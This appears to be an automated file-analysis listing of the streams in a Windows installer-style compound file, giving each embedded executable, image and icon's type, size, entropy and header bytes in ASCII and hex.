                                  Stream Path:\x17163\x16689\x18229\x16702\x16812\x17848\x16695\x17894\x16894\x17391
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Stream Size:408544
                                  Entropy:6.41059821146
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . . . 0 . . . c . . . c . . . c " . . b . . . c " . . b V . . c . . . b . . . c . . . b . . . c . . . b . . . c " . . b . . . c " . . b . . . c " . . b . . . c . . . c . . . c H . . b . . . c H . . b . . . c H . S c . . . c . . ; c . . . c H . . b . . . c
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14341\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x111, frames 3
                                  Stream Size:9319
                                  Entropy:7.35217207818
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14440\x14658\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x74, frames 3
                                  Stream Size:5714
                                  Entropy:7.42751568247
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x16822\x17380\x14504\x14336\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x222, frames 3
                                  Stream Size:22946
                                  Entropy:6.9205041088
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x17645\x18474
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x59, frames 3
                                  Stream Size:4502
                                  Entropy:7.59347638402
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16766\x17508\x16945\x18357\x18038\x18474
                                  File Type:SVG Scalable Vector Graphics image
                                  Stream Size:28870
                                  Entropy:4.29697375738
                                  Base64 Encoded:True
                                  Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " u t f - 8 " ? > . . < ! - - G e n e r a t o r : A d o b e I l l u s t r a t o r 2 5 . 2 . 3 , S V G E x p o r t P l u g - I n . S V G V e r s i o n : 6 . 0 0 B u i l d 0 ) - - > . . < s v g v e r s i o n = " 1 . 1 " i d = " L a y e r _ 8 " x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g " x m l n s : x l i n k = " h t t p : / / w w w . w 3 . o r g / 1 9 9 9 / x l i n k " x = " 0 p x " y =
                                  Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 35 2e 32 2e 33 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16830\x16880\x17199\x17329\x17764\x17589\x18490
                                  File Type:MS Windows icon resource - 3 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                  Stream Size:2862
                                  Entropy:3.16043065194
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . ( . . . 6 . . . . . . . . . . . h . . . ^ . . . . . . . . . . h . . . . . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w v . . . . . " " " " " o . . " " " " " o . . w w w " " . . . . . . " / . . . .
                                  Data Raw:00 00 01 00 03 00 10 10 10 00 00 00 04 00 28 01 00 00 36 00 00 00 10 10 00 00 00 00 08 00 68 05 00 00 5e 01 00 00 10 10 00 00 00 00 20 00 68 04 00 00 c6 06 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16830\x17458\x17395\x17896\x18476
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.35906224297
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16830\x17848\x17207\x17574\x18481
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.29856879699
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . . . . . { . w . . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14341\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, frames 3
                                  Stream Size:27770
                                  Entropy:7.06368048149
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14440\x14658\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, frames 3
                                  Stream Size:16673
                                  Entropy:7.30816983161
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x16822\x17380\x14504\x14336\x17278\x17075
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, frames 3
                                  Stream Size:69692
                                  Entropy:6.08285538491
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x17645\x18474
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x316, frames 3
                                  Stream Size:12626
                                  Entropy:7.45034483136
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . J F I F . . . . . . . . . . . . . . D u c k y . . . . . . . < . . . . . } h t t p : / / n s . a d o b e . c o m / x a p / 1 . 0 / . < ? x p a c k e t b e g i n = " . . . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " A d o b e X M P C o r e 6 . 0 - c 0 0 6 7 9 . d a b a c b b , 2 0 2 1 / 0 4 / 1 4 - 0 0 : 3 9 : 4 4 " > < r d f : R D F x m l n s : r d f =
                                  Data Raw:ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 7d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16894\x16684\x17583\x18346\x18038\x18474
                                  File Type:SVG Scalable Vector Graphics image
                                  Stream Size:33179
                                  Entropy:4.25625006704
                                  Base64 Encoded:True
                                  Data ASCII:< ? x m l v e r s i o n = " 1 . 0 " e n c o d i n g = " u t f - 8 " ? > . . < ! - - G e n e r a t o r : A d o b e I l l u s t r a t o r 2 5 . 2 . 3 , S V G E x p o r t P l u g - I n . S V G V e r s i o n : 6 . 0 0 B u i l d 0 ) - - > . . < s v g v e r s i o n = " 1 . 1 " i d = " M o n o _ 1 _ " x m l n s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 0 / s v g " x m l n s : x l i n k = " h t t p : / / w w w . w 3 . o r g / 1 9 9 9 / x l i n k " x = " 0 p x " y =
                                  Data Raw:3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 41 64 6f 62 65 20 49 6c 6c 75 73 74 72 61 74 6f 72 20 32 35 2e 32 2e 33 2c 20 53 56 47 20 45 78 70 6f 72 74 20 50 6c 75 67 2d 49 6e 20 2e 20 53 56 47 20 56 65 72 73 69 6f 6e 3a 20 36 2e 30 30 20 42 75 69 6c 64 20 30
                                  General
                                  Stream Path:\x17163\x16689\x18229\x16958\x16827\x16687\x17200\x18470
                                  File Type:MS Windows icon resource - 1 icon, 32x32, 16 colors
                                  Stream Size:766
                                  Entropy:3.3484862649
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 3 1 . . . . . . . . . . . . 3 3 2 3 3 3 3 3 3 3 3 3 3 3 3 . 3 3 $ D D D D D D D D D D D @ 1 . 2 D D D D D D D D D D D D D . . 2 D D D D D D @ D D D D D D C . 2 D D D D D D 3 4 D D D D D C . 2 D D D D D @ 3 0 D D D D D . . 3 $ D D D D D 3 4 D D D D D 1 . 3 $
                                  Data Raw:00 00 01 00 01 00 20 20 10 00 00 00 00 00 e8 02 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 c0 c0 00 80 80 80 00 00 80 80 00 00 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 33
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17214\x17009\x18482
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 16x16, 16 colors
                                  Stream Size:1078
                                  Entropy:2.86422695486
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . ( . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . w p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . p . . . . . . . . . . w w . . . w w . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 10 10 10 00 00 00 00 00 28 01 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 80 80 80 00 c0 c0 c0 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17214\x17841\x17207\x17574\x18481
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.40653521205
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . w . . . . . . . . . . p . . x . . . . w . . . . . . . . x . . . w . . w . . . . . . . p . . x x . . w ~ . . . . . . . . x . . . . . ~ . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17790\x17448\x18034\x16812\x18482
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.92283562852
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . w w . . . . . . . . . . . . w . f . w . . . . . . w . . . . . v v f . w . . . . . . . . . . . n f f l . w . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17790\x17640\x17188\x17205\x18470
                                  File Type:MS Windows icon resource - 2 icons, 32x32, 16 colors, 32x32
                                  Stream Size:2998
                                  Entropy:4.6676615263
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . ( . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . . . . . . . . . . . . . . . { . . . . . . . . . . . . . . . . . . p . . . . . . . . . . x . { . w p . . . . . . . . ( . . . { . w . . . . . . . . . ( x x x . . . . . . . . . . .
                                  Data Raw:00 00 01 00 02 00 20 20 10 00 00 00 00 00 e8 02 00 00 26 00 00 00 20 20 00 00 00 00 00 00 a8 08 00 00 0e 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 80 00 00 00 80 80 00 80 00 00 00 80 00 80 00 80 80 00 00 c0 c0 c0 00 80 80 80 00 00 00 ff 00 00 ff 00 00 00 ff ff 00 ff 00
                                  General
                                  Stream Path:\x17163\x16689\x18229\x17918\x16740\x16677\x17318
                                  File Type:PC bitmap, Windows 3.x format, 1 x 200 x 24
                                  Stream Size:854
                                  Entropy:3.80253159876
                                  Base64 Encoded:False
                                  Data ASCII:B M V . . . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:42 4d 56 03 00 00 00 00 00 00 36 00 00 00 28 00 00 00 01 00 00 00 c8 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ee f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f3 f4 00 ef f4 f4 00 ef f4 f4 00 ef f4 f5 00 ef f4 f5 00 ef f4 f5 00 ef f4
                                  General
                                  Stream Path:\x17163\x16689\x18229\x18046\x16940\x16954\x18357\x18152\x18472
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Stream Size:399328
                                  Entropy:6.5891658431
                                  Base64 Encoded:True
                                  Data ASCII:M Z . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . L . ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . M . . , N . . , N . . , N . B ^ M . . , N . B ^ K . = , N . . Y J . . , N . . Y M . . , N . . Y K . . , N . B ^ J . . , N . B ^ H . . , N . B ^ O . . , N . . , O . . , N . ( Y G . . , N . ( Y . . . , N . . , . . . , N . ( Y L . . , N . R i c h . , N .
                                  Data Raw:4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00
                                  General
